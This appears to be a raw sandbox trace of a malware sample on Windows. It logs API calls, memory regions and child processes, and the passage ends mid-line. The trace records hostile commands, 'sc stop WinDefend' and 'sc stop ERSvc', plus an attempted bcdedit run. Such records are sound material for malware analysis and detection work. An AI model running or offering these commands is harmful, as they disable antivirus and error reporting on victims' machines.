[0022.071] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0022.071] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0022.071] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0022.071] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0022.071] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0022.071] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0022.071] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0022.071] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0022.071] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0022.071] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0022.071] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0022.071] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0022.071] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0022.071] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0022.071] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0022.071] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0022.071] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0022.071] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0022.071] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0022.071] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0022.071] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0022.071] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0022.071] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0022.071] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0022.071] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0022.071] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0022.071] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0022.071] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0022.071] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0022.071] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0022.071] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0022.071] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0022.071] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0022.071] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0022.071] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0022.071] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0022.071] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0022.072] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0022.072] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0022.072] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0022.072] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0022.072] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0022.072] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0022.072] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0022.072] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0022.072] SetErrorMode (uMode=0x0) returned 0x0 [0022.072] SetErrorMode (uMode=0x1) returned 0x0 [0022.072] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x8007f8, lpFilePart=0x43f478 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f478*="Desktop") returned 0x25 [0022.072] SetErrorMode (uMode=0x0) returned 0x1 [0022.073] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0022.073] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0022.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.078] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.078] GetLastError () returned 0x2 [0022.078] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.078] GetLastError () returned 0x2 [0022.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.079] GetLastError () returned 0x2 [0022.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.079] GetLastError () returned 0x2 [0022.079] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.079] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.080] GetLastError () returned 0x2 [0022.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.080] GetLastError () returned 0x2 [0022.080] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.080] GetLastError () returned 0x2 [0022.080] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.081] GetLastError () returned 0x2 [0022.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.082] GetLastError () returned 0x2 [0022.082] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x43f1f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f1f4) returned 0xffffffff [0022.082] GetLastError () returned 0x2 [0022.083] _get_osfhandle (_FileHandle=2) returned 0xb [0022.083] GetFileType (hFile=0xb) returned 0x2 [0022.084] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0022.084] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x43f648 | out: lpMode=0x43f648) returned 1 [0022.084] _get_osfhandle (_FileHandle=2) returned 0xb [0022.084] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x43f67c | out: lpConsoleScreenBufferInfo=0x43f67c) returned 1 [0022.084] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a544640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0022.085] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a544640, nSize=0x2000, Arguments=0x43f6bc | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0022.085] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a544640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x43f6a0, lpReserved=0x0 | out: lpBuffer=0x4a544640*, lpNumberOfCharsWritten=0x43f6a0*=0x62) returned 1 [0022.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.085] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0022.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0022.085] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0022.085] _get_osfhandle (_FileHandle=0) returned 0x3 [0022.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0022.086] SetConsoleInputExeNameW () returned 0x1 [0022.086] GetConsoleOutputCP () returned 0x1b5 [0022.086] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0022.086] SetThreadUILanguage (LangId=0x0) returned 0x409 [0022.086] exit (_Code=1) Process: id = "15" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x63aa8000" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa44" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 936 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 937 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 938 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 939 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 940 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 941 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 942 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 943 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 944 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 945 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 946 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 947 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 948 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 949 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 950 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 951 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 952 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 982 start_va = 0x2f0000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 983 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 984 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 985 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 986 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 987 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1030 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1031 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1032 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1033 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1034 start_va = 0x4d0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1035 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1036 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1037 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1038 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1039 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1040 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1041 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1042 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1043 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1044 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1045 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1046 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1047 start_va = 0x370000 end_va = 0x42ffff entry_point = 0x370000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1048 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x80000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 39 os_tid = 0xb2c [0021.671] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15ff0c | out: lpSystemTimeAsFileTime=0x15ff0c*(dwLowDateTime=0x1485d4c0, dwHighDateTime=0x1d35d7b)) [0021.671] GetCurrentProcessId () returned 0xb28 [0021.671] GetCurrentThreadId () returned 0xb2c [0021.671] GetTickCount () returned 0x148a3 [0021.671] QueryPerformanceCounter (in: lpPerformanceCount=0x15ff04 | out: lpPerformanceCount=0x15ff04*=325696792) returned 1 [0021.671] GetModuleHandleA (lpModuleName=0x0) returned 0x180000 [0021.671] __set_app_type (_Type=0x1) [0021.671] __p__fmode () returned 0x76d831f4 [0021.671] __p__commode () returned 0x76d831fc [0021.671] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1879c7) returned 0x0 [0021.672] __wgetmainargs (in: _Argc=0x189020, _Argv=0x189028, _Env=0x189024, _DoWildCard=0, _StartInfo=0x189034 | out: _Argc=0x189020, _Argv=0x189028, _Env=0x189024) returned 0 [0021.672] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.674] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0021.674] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0021.675] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0021.675] _wcsicmp (_String1="stop", _String2="query") returned 2 [0021.675] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0021.675] _wcsicmp (_String1="stop", _String2="start") returned 14 [0021.675] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0021.675] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0021.675] _wcsicmp (_String1="stop", _String2="control") returned 16 [0021.675] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0021.675] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0021.675] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4df758 [0021.677] OpenServiceW (hSCManager=0x4df758, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x4df6b8 [0021.678] ControlService (in: hService=0x4df6b8, dwControl=0x1, lpServiceStatus=0x15fe08 | out: lpServiceStatus=0x15fe08*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0021.678] GetLastError () returned 0x426 [0021.678] _itow (in: _Dest=0x426, _Radix=1441188 | out: _Dest=0x426) returned="1062" [0021.678] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0x189380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0021.680] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x15fd8c, nSize=0x2, Arguments=0x15fd98 | out: lpBuffer="㵈N\x01") returned 0x49 [0021.683] GetFileType (hFile=0x7) returned 0x2 [0021.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x15fd60 | out: lpMode=0x15fd60) returned 1 [0021.683] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4e3d48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x15fd7c, lpReserved=0x0 | out: lpBuffer=0x4e3d48*, lpNumberOfCharsWritten=0x15fd7c*=0x49) returned 1 [0021.683] LocalFree (hMem=0x4e3d48) returned 0x0 [0021.684] LocalFree (hMem=0x0) returned 0x0 [0021.684] CloseServiceHandle (hSCObject=0x4df6b8) returned 1 [0021.684] CloseServiceHandle (hSCObject=0x4df758) returned 1 [0021.786] exit (_Code=1062) Thread: id = 46 os_tid = 0xb5c Process: id = "16" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x63a6c000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xa94" cmd_line = "sc stop ERSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 953 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 954 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 955 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 956 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 957 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 958 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 959 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x187997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 960 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 961 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 962 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 963 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 964 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 965 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 966 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 967 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 968 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 969 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 988 start_va = 0x4d0000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 989 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 990 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 991 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1009 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1010 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1011 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1012 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1013 start_va = 0x720000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1014 start_va = 0x751f0000 end_va = 0x751fbfff entry_point = 0x751f10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1015 start_va = 0x75200000 end_va = 0x7525ffff entry_point = 0x7521a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1016 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1017 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1018 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1019 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1020 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1021 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = 